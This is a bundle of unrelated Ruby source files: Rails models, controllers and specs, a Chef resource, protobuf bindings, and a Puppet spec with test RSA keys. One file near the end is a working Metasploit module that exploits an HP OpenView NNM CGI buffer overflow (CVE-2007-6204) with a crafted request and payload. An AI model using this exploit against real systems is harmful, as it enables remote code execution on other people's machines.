# ---- file 918a85158f83ec29b1a05dae7ea29183869cc866 ----
require 'ostruct'
require_relative '../spec_helper_lite'
require_relative '../fixtures/models/tag_list'
describe TagList do
include Conversions
describe "given a blank string" do
before do
@it = TagList.new("")
end
it "is empty" do
@it.must_be_empty
end
it "stringifies to the empty string" do
@it.to_s.must_equal ""
end
it "arrayifies to the empty array" do
@it.to_a.must_equal []
end
end
describe "given tags separated by commas or whitespace" do
before do
@it = TagList.new("barley, hops water, yeast")
end
it "is not empty" do
@it.wont_be_empty
end
it "stringifies to a comma separated list" do
@it.to_s.must_equal "barley, hops, water, yeast"
end
it "arrayifies to a list of strings" do
@it.to_a.must_equal %w[barley hops water yeast]
end
end
describe "given duplicate tags" do
before do
@it = TagList.new("barley, hops, barley")
end
it "eliminates duplicates" do
@it.to_a.must_equal %w(barley hops)
end
end
describe "given mixed-case tags" do
before do
@it = TagList.new("Barley, hOps, YEAST")
end
it "lowercases the tags" do
@it.to_a.must_equal %w(barley hops yeast)
end
end
describe "given duplicate mixed case tags" do
before do
@it = TagList.new("barley, hops, BarlEy")
end
it "eliminates duplicates ignoring case" do
@it.to_a.must_equal %w(barley hops)
end
end
describe "given nil" do
before do
@it = TagList.new(nil)
end
it "is empty" do
@it.must_be_empty
end
end
describe "#+" do
it "combines tag lists into one" do
result = TagList.new("foo, bar") + TagList.new("baz, buz")
result.must_equal(TagList.new("foo, bar, baz, buz"))
end
end
describe "#alphabetical" do
before do
@it = TagList.new("foo, bar, baz, fuz")
@result = @it.alphabetical
end
it "returns the tags in alpha order" do
@result.to_a.must_equal %w(bar baz foo fuz)
end
it "returns another tag list" do
@result.must_be_kind_of TagList
@result.wont_be_same_as @it
end
end
describe "TagList()" do
describe "given a TagList" do
it "returns the same tag list" do
list = TagList.new("")
TagList(list).must_be_same_as(list)
end
end
describe "given an array" do
before do
@it = TagList(%w[foo bar])
end
it "returns a tag list" do
@it.must_be_kind_of(TagList)
end
it "contains the given tags" do
@it.to_a.must_equal(%w[foo bar])
end
end
end
end
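# ---------------------------------------------------------------------------
# Hedged sketch: the fixture under test (fixtures/models/tag_list) is not part
# of this dump, so the following minimal TagList -- the split pattern, the
# Conversions module, and the equality semantics -- is inferred from the
# expectations above, not the actual fixture.
module Conversions
  # Coerce a value into a TagList; an existing TagList passes through as-is.
  def TagList(value)
    value.is_a?(TagList) ? value : TagList.new(Array(value).join(', '))
  end
end

class TagList
  def initialize(raw)
    # Split on commas and/or whitespace, normalize case, drop duplicates.
    @tags = String(raw).split(/[,\s]+/).map(&:downcase).uniq
  end

  def empty?
    @tags.empty?
  end

  def to_a
    @tags.dup
  end

  def to_s
    @tags.join(', ')
  end

  def +(other)
    TagList.new((to_a + other.to_a).join(', '))
  end

  def alphabetical
    TagList.new(@tags.sort.join(', '))
  end

  def ==(other)
    other.is_a?(TagList) && to_a == other.to_a
  end
end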
# ---- file 26778083c5190ea4d9ae46b365a15e8c590cbf00 ----
class Githubris::OAuth
REQUEST_ACCESS_URL = Addressable::URI.parse("https://github.com/login/oauth/authorize")
def initialize(client_id, client_secret, api=Githubris::API.new)
@client_id = client_id
@client_secret = client_secret
@api = api
end
def request_access_url(query={})
add_query_params_to(REQUEST_ACCESS_URL, query).to_s
end
def access_token(code)
@api.post_oauth_access_token(access_token_params(code))
end
private
def add_query_params_to(uri, query)
uri.tap do |uri|
uri.query_values = query_values(query)
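# Addressable percent-encodes the joined scope list (e.g. "," becomes "%2C");
# decoding restores a readable comma-separated value for GitHub. Note that
# URI.decode is deprecated (removed in Ruby 3.0); CGI.unescape is the modern
# equivalent if this code is ever updated.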
uri.query = URI.decode(uri.query)
end
end
def query_values(query)
{ :client_id => @client_id }.tap do |query_values|
query_values[:scopes] = query[:scopes].join(',') if query[:scopes]
query_values[:redirect_uri] = query[:redirect_uri] if query[:redirect_uri]
end
end
def access_token_params(code)
{
:client_id => @client_id,
:client_secret => @client_secret,
:code => code
}
end
end
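# Hedged usage sketch for Githubris::OAuth (the client id/secret below are
# placeholders; the return value of #access_token depends on
# Githubris::API#post_oauth_access_token, which lives elsewhere).
#
#   oauth = Githubris::OAuth.new('my_client_id', 'my_client_secret')
#   oauth.request_access_url(:scopes => [:user, :public_repo])
#   # => e.g. "https://github.com/login/oauth/authorize?client_id=my_client_id&scopes=user,public_repo"
#
#   # After GitHub redirects back with ?code=..., exchange it for a token:
#   # oauth.access_token(params[:code])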
# ---- file 6a17d932d034efe2eb5979204432ed87c1a8efe2 ----
# frozen_string_literal: true
require 'spec_helper'
RSpec.describe GitlabSchema.types['TerraformStateVersion'] do
include GraphqlHelpers
it { expect(described_class.graphql_name).to eq('TerraformStateVersion') }
it { expect(described_class).to require_graphql_authorizations(:read_terraform_state) }
describe 'fields' do
let(:fields) { %i[id created_by_user job download_path serial created_at updated_at] }
it { expect(described_class).to have_graphql_fields(fields) }
it { expect(described_class.fields['id'].type).to be_non_null }
it { expect(described_class.fields['createdByUser'].type).not_to be_non_null }
it { expect(described_class.fields['job'].type).not_to be_non_null }
it { expect(described_class.fields['downloadPath'].type).not_to be_non_null }
it { expect(described_class.fields['serial'].type).not_to be_non_null }
it { expect(described_class.fields['createdAt'].type).to be_non_null }
it { expect(described_class.fields['updatedAt'].type).to be_non_null }
end
describe 'query' do
let_it_be(:project) { create(:project) }
let_it_be(:user) { create(:user) }
let_it_be(:terraform_state) { create(:terraform_state, :with_version, :locked, project: project) }
before do
project.add_developer(user)
end
let(:query) do
<<~GRAPHQL
query {
project(fullPath: "#{project.full_path}") {
terraformState(name: "#{terraform_state.name}") {
latestVersion {
id
job {
name
}
}
}
}
}
GRAPHQL
end
subject(:execute) { GitlabSchema.execute(query, context: { current_user: user }).as_json }
shared_examples 'returning latest version' do
it 'returns latest version of terraform state' do
expect(execute.dig('data', 'project', 'terraformState', 'latestVersion')).to match a_graphql_entity_for(
terraform_state.latest_version
)
end
end
it_behaves_like 'returning latest version'
it 'returns job of the latest version' do
expect(execute.dig('data', 'project', 'terraformState', 'latestVersion', 'job')).to be_present
end
context 'when user cannot read jobs' do
before do
allow(Ability).to receive(:allowed?).and_call_original
allow(Ability).to receive(:allowed?).with(user, :read_commit_status, terraform_state.latest_version).and_return(false)
end
it_behaves_like 'returning latest version'
it 'does not return job of the latest version' do
expect(execute.dig('data', 'project', 'terraformState', 'latestVersion', 'job')).not_to be_present
end
end
end
end
# ---- file 1c61d3c888955760b71dede53cef785145ae4029 ----
class User < ApplicationRecord
include Mergeable
enum sync_approval_status: {
requested: 'requested',
allowed: 'allowed',
denied: 'denied'
}, _prefix: true
has_secure_password
has_many :user_facilities, dependent: :delete_all
has_many :facilities, through: :user_facilities
has_many :blood_pressures
has_many :patients, through: :blood_pressures
has_many :audit_logs, as: :auditable
before_create :set_otp
before_create :set_access_token
validates :full_name, presence: true
validates :phone_number, presence: true, uniqueness: true
validates :password, allow_blank: true, length: { is: 4 }, format: { with: /[0-9]/, message: 'only allows numbers' }
validate :presence_of_password
def presence_of_password
unless password_digest.present? || password.present?
errors.add(:password, 'Either password_digest or password should be present')
end
end
def set_otp
generated_otp = self.class.generate_otp
self.otp = generated_otp[:otp]
self.otp_valid_until = generated_otp[:otp_valid_until]
end
def set_access_token
self.access_token = self.class.generate_access_token
end
def sync_approval_denied(reason = "")
self.sync_approval_status = :denied
self.sync_approval_status_reason = reason
end
def sync_approval_allowed(reason = "")
self.sync_approval_status = :allowed
self.sync_approval_status_reason = reason
end
def sync_approval_requested(reason)
self.sync_approval_status = :requested
self.sync_approval_status_reason = reason
end
def self.generate_otp
digits = FeatureToggle.enabled?('FIXED_OTP_ON_REQUEST_FOR_QA') ? [0] : (0..9).to_a
otp = ''
6.times do
otp += digits.sample.to_s
end
otp_valid_until = Time.now + ENV['USER_OTP_VALID_UNTIL_DELTA_IN_MINUTES'].to_i.minutes
{ otp: otp, otp_valid_until: otp_valid_until }
end
def self.generate_access_token
SecureRandom.hex(32)
end
def access_token_valid?
self.sync_approval_status_allowed?
end
def otp_valid?
otp_valid_until >= Time.now
end
def mark_as_logged_in
now = Time.now
self.otp_valid_until = now
self.logged_in_at = now
save
end
def has_never_logged_in?
!logged_in_at.present?
end
def reset_login
self.logged_in_at = nil
end
def self.requested_sync_approval
where(sync_approval_status: :requested)
end
def reset_password(password_digest)
self.password_digest = password_digest
self.set_access_token
self.sync_approval_requested(I18n.t('reset_password'))
end
def registered_at_facility
self.facilities.order(:created_at).first
end
end
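# Hedged sketch of the OTP lifecycle above (assumes FeatureToggle and the
# USER_OTP_VALID_UNTIL_DELTA_IN_MINUTES env var are configured):
#
#   user = User.create!(full_name: 'Jane', phone_number: '555-0100',
#                       password: '1234')  # before_create sets OTP + token
#   user.otp           # => a six-digit string, e.g. "004213"
#   user.otp_valid?    # => true until otp_valid_until passes
#   user.mark_as_logged_in  # stamps logged_in_at and expires the OTP by
#                           # moving otp_valid_until to the current time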
# ---- file 5d328efe0079f3e8ef4fa70763d8b17c3dbd99fc ----
class MainController < ApplicationController
before_action :current_election
def search
if @current_election.state == 'all'
@states = State.ransack(name_cont: search_params).result(distinct: true)
end
@districts = District.election(@current_election).
ransack(name_cont: search_params).result(distinct: true)
@municipalities = Municipality.election(@current_election).
ransack(name_cont: search_params).result(distinct: true)
respond_to do |format|
format.html {}
format.json {
if @current_election.state == 'all'
@states = @states.limit(3)
end
@districts = @districts.limit(6)
@municipalities = @municipalities.limit(10)
}
end
end
private
def search_params
params[:q].gsub(' ','').gsub(/[^0-9a-z\-üßöäA-ZÜÖÄ ]/i, '')
end
end
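# Hedged illustration of #search_params above: spaces are removed first, then
# every character outside 0-9, a-z/A-Z, the German umlauts/ß, and '-' is
# stripped, e.g.:
#
#   "Frankfurt (Oder)!"  ->  "Frankfurt(Oder)!"  ->  "FrankfurtOder"
#   "Baden-Württemberg"  ->  "Baden-Württemberg"     (unchanged)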
# ---- file 1cc74a6c7b9c98dd9e81364189e5e42b49bc8dce ----
require "app/presenters/weekly_calendar_presenter"
require "app/queries/show_weekly_calendar"
RSpec.describe Carpanta::Presenters::WeeklyCalendarPresenter do
let(:date) { Date.new(2021, 1, 28) }
let(:weekly_calendar) do
Carpanta::Queries::ShowWeeklyCalendar::WeeklyCalendar.new(
date: Domain::Shared::Date.new(date),
appointments: []
)
end
subject { described_class.new(weekly_calendar) }
describe "#days_of_week" do
it "responds to days_of_week" do
expect(subject).to respond_to(:days_of_week)
end
end
describe "#unique_month_year" do
let(:date) { Date.new(2020, 12, 17) }
it "displays unique abbreviated month name and year with century for the collection of dates" do
result = subject.unique_month_year
expect(result).to eq("Dec 2020")
end
context "when there are dates from different months" do
let(:date) { Date.new(2020, 11, 30) }
it "displays unique abbreviated month name and year with century for the collection of dates" do
result = subject.unique_month_year
expect(result).to eq("Nov - Dec 2020")
end
end
context "when there are dates from different years" do
let(:date) { Date.new(2020, 12, 31) }
it "displays unique abbreviated month name and year with century for the collection of dates" do
result = subject.unique_month_year
expect(result).to eq("Dec 2020 - Jan 2021")
end
end
end
describe "#weekday_name_and_day_of_month" do
let(:date) { Date.new(2020, 12, 21) }
it "displays abbreviated weekday name followed by day of the month" do
result = subject.weekday_name_and_day_of_month(date)
expect(result).to eq("Mon 21")
end
end
describe "#grid_area" do
let(:time) { Time.new(2020, 12, 28, 17, 0, 0) }
let(:duration) { 30 }
it "returns grid column, grid row start and grid row end" do
result = subject.grid_area(time: time, duration: duration)
expect(result).to eq("grid-column: 3; grid-row-start: 23; grid-row-end: 24;")
end
end
describe "#today_link" do
let(:date) { Date.new(2020, 12, 28) }
before do
allow(Time).to receive(:now).and_return(Time.new(2021, 2, 3, 8, 10, 0))
end
it "returns a link to the weekly calendar for today's date" do
result = subject.today_link
expect(result).to eq("/calendar/week/2021-02-03")
end
end
describe "#previous_link" do
let(:date) { Date.new(2020, 12, 28) }
it "returns a link to the weekly calendar for the previous week of a date" do
result = subject.previous_link
expect(result).to eq("/calendar/week/2020-12-21")
end
end
describe "#next_link" do
let(:date) { Date.new(2020, 12, 28) }
it "returns a link to the weekly calendar for the next week of a date" do
result = subject.next_link
expect(result).to eq("/calendar/week/2021-01-04")
end
end
describe "#current_time_in_week?" do
let(:date) { Date.new(2020, 12, 28) }
it "returns true" do
allow(Time).to receive(:now).and_return(Time.new(2020, 12, 28, 8, 25, 0))
result = subject.current_time_in_week?
expect(result).to eq(true)
end
it "returns false" do
result = subject.current_time_in_week?
expect(result).to eq(false)
end
end
describe "#grid_area_for_current_time_in_week" do
it "returns grid column, grid row start and grid row end" do
allow(Time).to receive(:now).and_return(Time.new(2021, 2, 4, 8, 40, 0))
result = subject.grid_area_for_current_time_in_week
expect(result).to eq("grid-column: 6; grid-row-start: 7; grid-row-end: 7;")
end
end
end
# ---- file 110a1d85b72c5acb1f865adc4cb5319186e11ea4 ----
actions :add, :remove, :enable, :disable
default_action :add
attribute :service, kind_of: String, required: true,
equal_to: %w(accessibility calendar contacts icloud location reminders)
attribute :applications, kind_of: [Array, NilClass], default: nil
attribute :user, kind_of: [String, NilClass], default: nil
attribute :language, kind_of: [String, NilClass], default: nil
attribute :log_dest, kind_of: [String, NilClass], default: nil
attribute :admin, kind_of: [TrueClass, FalseClass], default: false # admin deprecated, use no_check_bin
attribute :no_check_bin, kind_of: [TrueClass, FalseClass], default: false
attribute :forceroot, kind_of: [TrueClass, FalseClass], default: false
attribute :template, kind_of: [TrueClass, FalseClass], default: false
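# Hedged recipe-side sketch for the resource above. The resource name
# (assumed here as `privacy_services`) is defined by the cookbook that ships
# this file and is not visible in this snippet:
#
#   privacy_services 'terminal accessibility' do
#     service      'accessibility'
#     applications ['/Applications/Utilities/Terminal.app']
#     action       :add
#   end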
# ---- file 1a004997249e8d596a3c07af939469c9886581cc ----
class CreateTestLogs < ActiveRecord::Migration
def change
create_table :test_logs do |t|
t.string :cno
t.integer :city_code
t.timestamps
end
end
end
# ---- file 39d88336061f24abc153abe30dc2c2b4ffa0c4f3 ----
class Agents::SessionsController < Devise::SessionsController
# before_filter :configure_sign_in_params, only: [:create]
# GET /resource/sign_in
# def new
# super
# end
# POST /resource/sign_in
# def create
# super
# end
# DELETE /resource/sign_out
# def destroy
# super
# end
# protected
# If you have extra params to permit, append them to the sanitizer.
# def configure_sign_in_params
# devise_parameter_sanitizer.for(:sign_in) << :attribute
# end
end
# ---- file 08a24234e7896c8a7f58f4ab2de7388380b32a3a ----
# frozen_string_literal: true
require 'spec_helper'
describe 'validate_x509_rsa_key_pair' do
# rubocop:disable Layout/IndentHeredoc
let(:valid_cert) do
<<DOC
-----BEGIN CERTIFICATE-----
MIIC9jCCAeCgAwIBAgIRAK11n3X7aypJ7FPM8UFyAeowCwYJKoZIhvcNAQELMBIx
EDAOBgNVBAoTB0FjbWUgQ28wHhcNMTUxMTIzMjIzOTU4WhcNMTYxMTIyMjIzOTU4
WjASMRAwDgYDVQQKEwdBY21lIENvMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIB
CgKCAQEAz9bY/piKahD10AiJSfbI2A8NG5UwRz0r9T/WfvNVdhgrsGFgNQjvpUoZ
nNJpQIHBbgMOiXqfATFjJl5FjEkSf7GUHohlGVls9MX2JmVvknzsiitd75H/EJd+
N+k915lix8Vqmj8d1CTlbF/8tEjzANI67Vqw5QTuqebO7rkIUvRg6yiRfSo75FK1
RinCJyl++kmleBwQZBInQyg95GvJ5JTqMzBs67DeeyzskDhTeTePRYVF2NwL8QzY
htvLIBERTNsyU5i7nkxY5ptUwgFUwd93LH4Q19tPqL5C5RZqXxhE51thOOwafm+a
W/cRkqYqV+tv+j1jJ3WICyF1JNW0BQIDAQABo0swSTAOBgNVHQ8BAf8EBAMCAKAw
EwYDVR0lBAwwCgYIKwYBBQUHAwEwDAYDVR0TAQH/BAIwADAUBgNVHREEDTALggls
b2NhbGhvc3QwCwYJKoZIhvcNAQELA4IBAQAzRo0hpVTrFQZLIXpwvKwZVGvJdCkV
P95DTsSk/VTGV+/YtxrRqks++hJZnctm2PbnTsCAoIP3AMx+vicCKiKrxvpsLU8/
+6cowUbcuGMdSQktwDqbAgEhQlLsETll06w1D/KC+ejOc4+LRn3GQcEyGDtMk/EX
IeAvBZHr4/kVXWnfo6kzCLcku1f8yE/yDEFClZe9XV1Lk/s+3YfXVtNnMJJ1giZI
QVOe6CkmuQq+4AtIeW8aLkvlfp632jag1F77a1y+L268koKkj0hBMrtcErVQaxmq
xym0+soR4Tk4pTIGckeFglrLxkP2JpM/yTwSEAVlmG9vgTliYKyR0uMl
-----END CERTIFICATE-----
DOC
end
let(:valid_key) do
<<DOC
-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEAz9bY/piKahD10AiJSfbI2A8NG5UwRz0r9T/WfvNVdhgrsGFg
NQjvpUoZnNJpQIHBbgMOiXqfATFjJl5FjEkSf7GUHohlGVls9MX2JmVvknzsiitd
75H/EJd+N+k915lix8Vqmj8d1CTlbF/8tEjzANI67Vqw5QTuqebO7rkIUvRg6yiR
fSo75FK1RinCJyl++kmleBwQZBInQyg95GvJ5JTqMzBs67DeeyzskDhTeTePRYVF
2NwL8QzYhtvLIBERTNsyU5i7nkxY5ptUwgFUwd93LH4Q19tPqL5C5RZqXxhE51th
OOwafm+aW/cRkqYqV+tv+j1jJ3WICyF1JNW0BQIDAQABAoIBADAiZ/r+xP+vkd5u
O61/lCBFzBlZQecdybJw6HJaVK6XBndA9hESUr4LHUdui6W+51ddKd65IV4bXAUk
zCKjQb+FFvLDT/bA+TTvLATUdTSN7hJJ3OWBAHuNOlQklof6JCB0Hi4+89+P8/pX
eKUgR/cmuTMDT/iaXdPHeqFbBQyA1ZpQFRjN5LyyJMS/9FkywuNc5wlpsArtc51T
gIKENUZCuPhosR+kMFc2iuTNvqZWPhvouSrmhi2O6nSqV+oy0+irlqSpCF2GsCI8
72TtLpq94Grrq0BEH5avouV+Lp4k83vO65OKCQKUFQlxz3Xkxm2U3J7KzxqnRtM3
/b+cJ/kCgYEA6/yOnaEYhH/7ijhZbPn8RujXZ5VGJXKJqIuaPiHMmHVS5p1j6Bah
2PcnqJA2IlLs3UloN+ziAxAIH6KCBiwlQ/uPBNMMaJsIjPNBEy8axjndKhKUpidg
R0OJ7RQqMShOJ8akrSfWdPtXC/GBuwCYE//t77GgZaIMO3FcT9EKA48CgYEA4Xcx
Fia0Jg9iyAhNmUOXI6hWcGENavMx01+x7XFhbnMjIKTZevFfTnTkrX6HyLXyGtMU
gHOn+k4PE/purI4ARrKO8m5wYEKqSIt4dBMTkIXXirfQjXgfjR8E4T/aPe5fOFZo
7OYuxLRtzmG1C2sW4txwKAKX1LaWcVx/RLSttSsCgYBbcj8Brk+F6OJcqYFdzXGJ
OOlf5mSMVlopyg83THmwCqbZXtw8L6kAHqZrl5airmfDSJLuOQlMDoZXW+3u3mSC
d5TwVahVUN57YDgzaumBLyMZDqIz0MZqVy23hTzkV64Rk9R0lR9xrYQJyMhw4sYL
2f0mCTsSpzz+O+t9so+i2QKBgEC38gMlwPhb2kMI/x1LZYr6uzUu5qcYf+jowy4h
KZKGwkKQj0zXFEB1FV8nvtpCP+irRmtIx6L13SYi8LnfWPzyLE4ynVdES5TfVAgd
obQOdzx+XwL8xDHCAaiWp5K3ZeXKB/xYZnxYPlzLdyh76Ond1OPnOqX4c16+6llS
c7pZAoGATd9NckT0XtXLEsF3IraDivq8dP6bccX2DNfS8UeEvRRrRwpFpSRrmuGb
jbG4yzoIX4RjQfj/z48hwhJB+cKiN9WwcPsFXtHe7v3F6BRwK0JUfrCiXad8/SGZ
KAf7Dfqi608zBdnPWHacre2Y35gPHB00nFQOLS6u46aBNSq07YA=
-----END RSA PRIVATE KEY-----
DOC
end
let(:another_valid_key) do
<<DOC
-----BEGIN RSA PRIVATE KEY-----
MIIEpAIBAAKCAQEAoISxYJBTPAeAzFnm+lE/ljLlmGal2Xr3vwZKkvJiuKA/m4QJ
0ZNdtkBSDOVuG2dXVv6W4sChRtsCdvuVe7bjTYvlU8TWM3VEJDL9l9cRXScxxlKQ
Xwb35y1yV35NJfaK/jzm9KcErtQQs1RxvGlWRaohmLM8uQcuhjZfMsSlQoHQD5LX
sbPtk82RPyxYc1dj2vsaoi1VvuP2+jv4xLQOmNJY1bT5GTurqiltmxEtWhNNmGg0
2wtK00ifqLVO5HNc3gXQCDM2M99Sbmn1YtbrgsU9xMYfcPmvQvb+YoKskyoqck+c
HR//hi7vslbxABrny15LBkEfRc4TickphSGYXwIDAQABAoIBAATEzGw8/WwMIQRx
K06GeWgh7PZBHm4+m/ud2TtSXiJ0CE+7dXs3cJJIiOd/LW08/bhE6gCkjmYHfaRB
Ryicv1X/cPmzIFX5BuQ4a5ZGOmrVDkKBE27vSxAgJoR46RvWnjx9XLMp/xaekDxz
psldK8X4DvV1ZbltgDFWji947hvyqUtHdKnkQnc5j7aCIFJf9GMfzaeeDPMaL8WF
mVL4iy9EAOjNOHBshZj/OHyU5FbJ8ROwZQlCOiLCdFegftSIXt8EYDnjB3BdsALH
N6hquqrD7xDKyRbTD0K7lqxUubuMwTQpi61jZD8TBTXEPyFVAnoMpXkc0Y+np40A
YiIsR+kCgYEAyrc4Bh6fb9gt49IXGXOSRZ5i5+TmJho4kzIONrJ7Ndclwx9wzHfh
eGBodWaw5CxxQGMf4vEiaZrpAiSFeDffBLR+Wa2TFE5aWkdYkR34maDjO00m4PE1
S+YsZoGw7rGmmj+KS4qv2T26FEHtUI+F31RC1FPohLsQ22Jbn1ORipsCgYEAyrYB
J2Ncf2DlX1C0GfxyUHQOTNl0V5gpGvpbZ0WmWksumYz2kSGOAJkxuDKd9mKVlAcz
czmN+OOetuHTNqds2JJKKJy6hJbgCdd9aho3dId5Xs4oh4YwuFQiG8R/bJZfTlXo
99Qr02L7MmDWYLmrR3BA/93UPeorHPtjqSaYU40CgYEAtmGfWwokIglaSDVVqQVs
3YwBqmcrla5TpkMLvLRZ2/fktqfL4Xod9iKu+Klajv9ZKTfFkXWno2HHL7FSD/Yc
hWwqnV5oDIXuDnlQOse/SeERb+IbD5iUfePpoJQgbrCQlwiB0TNGwOojR2SFMczf
Ai4aLlQLx5dSND9K9Y7HS+8CgYEAixlHQ2r4LuQjoTs0ytwi6TgqE+vn3K+qDTwc
eoods7oBWRaUn1RCKAD3UClToZ1WfMRQNtIYrOAsqdveXpOWqioAP0wE5TTOuZIo
GiWxRgIsc7TNtOmNBv+chCdbNP0emxdyjJUIGb7DFnfCw47EjHnn8Guc13uXaATN
B2ZXgoUCgYAGa13P0ggUf5BMJpBd8S08jKRyvZb1CDXcUCuGtk2yEx45ern9U5WY
zJ13E5z9MKKO8nkGBqrRfjJa8Xhxk4HKNFuzHEet5lvNE7IKCF4YQRb0ZBhnb/78
+4ZKjFki1RrWRNSw9TdvrK6qaDKgTtCTtfRVXAYQXUgq7lSFOTtL3A==
-----END RSA PRIVATE KEY-----
DOC
end
# rubocop:enable Layout/IndentHeredoc
let(:valid_cert_but_indented) do
valid_cert.gsub(%r{^}, ' ')
end
let(:valid_key_but_indented) do
valid_key.gsub(%r{^}, ' ')
end
let(:malformed_cert) do
truncate_middle(valid_cert)
end
let(:malformed_key) do
truncate_middle(valid_key)
end
let(:bad_cert) do
'foo'
end
let(:bad_key) do
'bar'
end
context 'with function signature validation' do
it { is_expected.not_to eq(nil) }
it { is_expected.to run.with_params.and_raise_error(Puppet::ParseError, %r{wrong number of arguments}i) }
it { is_expected.to run.with_params(0, 1, 2, 3).and_raise_error(Puppet::ParseError, %r{wrong number of arguments}i) }
end
context 'with valid input' do
describe 'valid certificate and key' do
it { is_expected.to run.with_params(valid_cert, valid_key) }
end
end
context 'with bad input' do
describe 'valid certificate, valid but indented key' do
it { is_expected.to run.with_params(valid_cert, valid_key_but_indented).and_raise_error(Puppet::ParseError, %r{Not a valid RSA key}) }
end
describe 'valid certificate, malformed key' do
it { is_expected.to run.with_params(valid_cert, malformed_key).and_raise_error(Puppet::ParseError, %r{Not a valid RSA key}) }
end
describe 'valid certificate, bad key' do
it { is_expected.to run.with_params(valid_cert, bad_key).and_raise_error(Puppet::ParseError, %r{Not a valid RSA key}) }
end
describe 'valid but indented certificate, valid key' do
it { is_expected.to run.with_params(valid_cert_but_indented, valid_key).and_raise_error(Puppet::ParseError, %r{Not a valid x509 certificate}) }
end
describe 'malformed certificate, valid key' do
it { is_expected.to run.with_params(malformed_cert, valid_key).and_raise_error(Puppet::ParseError, %r{Not a valid x509 certificate}) }
end
describe 'bad certificate, valid key' do
it { is_expected.to run.with_params(bad_cert, valid_key).and_raise_error(Puppet::ParseError, %r{Not a valid x509 certificate}) }
end
describe 'validate certificate and key; certficate not signed by key' do
it { is_expected.to run.with_params(valid_cert, another_valid_key).and_raise_error(Puppet::ParseError, %r{Certificate signature does not match supplied key}) }
end
describe 'valid cert and key but arguments in wrong order' do
it { is_expected.to run.with_params(valid_key, valid_cert).and_raise_error(Puppet::ParseError, %r{Not a valid x509 certificate}) }
end
describe 'non-string arguments' do
it { is_expected.to run.with_params({}, {}).and_raise_error(Puppet::ParseError, %r{is not a string}) }
it { is_expected.to run.with_params(1, 1).and_raise_error(Puppet::ParseError, %r{is not a string}) }
it { is_expected.to run.with_params(true, true).and_raise_error(Puppet::ParseError, %r{is not a string}) }
it { is_expected.to run.with_params('foo', {}).and_raise_error(Puppet::ParseError, %r{is not a string}) }
it { is_expected.to run.with_params(1, 'bar').and_raise_error(Puppet::ParseError, %r{is not a string}) }
it { is_expected.to run.with_params('baz', true).and_raise_error(Puppet::ParseError, %r{is not a string}) }
end
end
def truncate_middle(string)
chars_to_truncate = 48
middle = (string.length / 2).floor
start_pos = middle - (chars_to_truncate / 2)
end_pos = middle + (chars_to_truncate / 2)
string[0..start_pos] + string[end_pos..-1]
end
end
# ---- file 03c4b2151dd5c4791019ba07a2ccc0d6170a34ca ----
require 'test_helper'
class FoodControllerTest < ActionDispatch::IntegrationTest
# test "the truth" do
# assert true
# end
end
# ---- file 21cd59856a013bedfcc740b0c89668129bbd4253 ----
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/ads/googleads/v3/services/invoice_service.proto
require 'google/protobuf'
require 'google/ads/google_ads/v3/enums/month_of_year_pb'
require 'google/ads/google_ads/v3/resources/invoice_pb'
require 'google/api/annotations_pb'
require 'google/api/client_pb'
require 'google/api/field_behavior_pb'
Google::Protobuf::DescriptorPool.generated_pool.build do
add_file("google/ads/googleads/v3/services/invoice_service.proto", :syntax => :proto3) do
add_message "google.ads.googleads.v3.services.ListInvoicesRequest" do
optional :customer_id, :string, 1
optional :billing_setup, :string, 2
optional :issue_year, :string, 3
optional :issue_month, :enum, 4, "google.ads.googleads.v3.enums.MonthOfYearEnum.MonthOfYear"
end
add_message "google.ads.googleads.v3.services.ListInvoicesResponse" do
repeated :invoices, :message, 1, "google.ads.googleads.v3.resources.Invoice"
end
end
end
module Google
module Ads
module GoogleAds
module V3
module Services
ListInvoicesRequest = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.ads.googleads.v3.services.ListInvoicesRequest").msgclass
ListInvoicesResponse = ::Google::Protobuf::DescriptorPool.generated_pool.lookup("google.ads.googleads.v3.services.ListInvoicesResponse").msgclass
end
end
end
end
end
# ---- file 62dd81185305d6c8cad5a60ca186796d03954ccb ----
module Pod
module Generator
class BridgeSupport
extend Executable
executable :gen_bridge_metadata
attr_reader :headers
def initialize(headers)
@headers = headers
end
def search_paths
@headers.map { |header| "-I '#{header.dirname}'" }.uniq
end
def save_as(pathname)
gen_bridge_metadata %{-c "#{search_paths.join(' ')}" -o '#{pathname}' '#{headers.join("' '")}'}
end
end
end
end
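# Hedged usage sketch: #search_paths calls header.dirname, so Pathname objects
# (not plain strings) are assumed for the header list.
#
#   require 'pathname'
#   headers = Pathname.glob('Pods/SomeLib/**/*.h')  # placeholder glob
#   Pod::Generator::BridgeSupport.new(headers).save_as(Pathname.new('SomeLib.bridgesupport'))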
# ---- file 0320087ee8f0819cfd7f04030d6e30eb6f212f65 ----
class Tag < ActiveRecord::Base
has_many :taggings
has_many :tasks, through: :taggings
end
# ---- file edff3b0c55e0053fb558bec68281fff2c2ada6c1 ----
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
'Name' => 'HP OpenView Network Node Manager OpenView5.exe CGI Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50.
By sending a specially crafted CGI request, an attacker may be able to execute
arbitrary code.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2007-6204' ],
[ 'OSVDB', '39530' ],
[ 'BID', '26741' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Privileged' => false,
'Payload' =>
{
'Space' => 650,
'BadChars' => "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'HP OpenView Network Node Manager 7.50 / Windows 2000 All', { 'Ret' => 0x5a01d78d } ], # ov.dll
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Dec 6 2007'))
register_options( [ Opt::RPORT(80) ], self.class )
end
def exploit
connect
sploit = "GET /OvCgi/OpenView5.exe?Context=Snmp&Action=" + rand_text_alpha_upper(5123)
sploit << [target.ret].pack('V') + payload.encoded
print_status("Trying target %s..." % target.name)
sock.put(sploit + "\r\n\r\n")
handler
disconnect
end
end
# ---- file 38094eecebf968a51ed800b1c91a550fc498de86 ----
# Generated by the protocol buffer compiler. DO NOT EDIT!
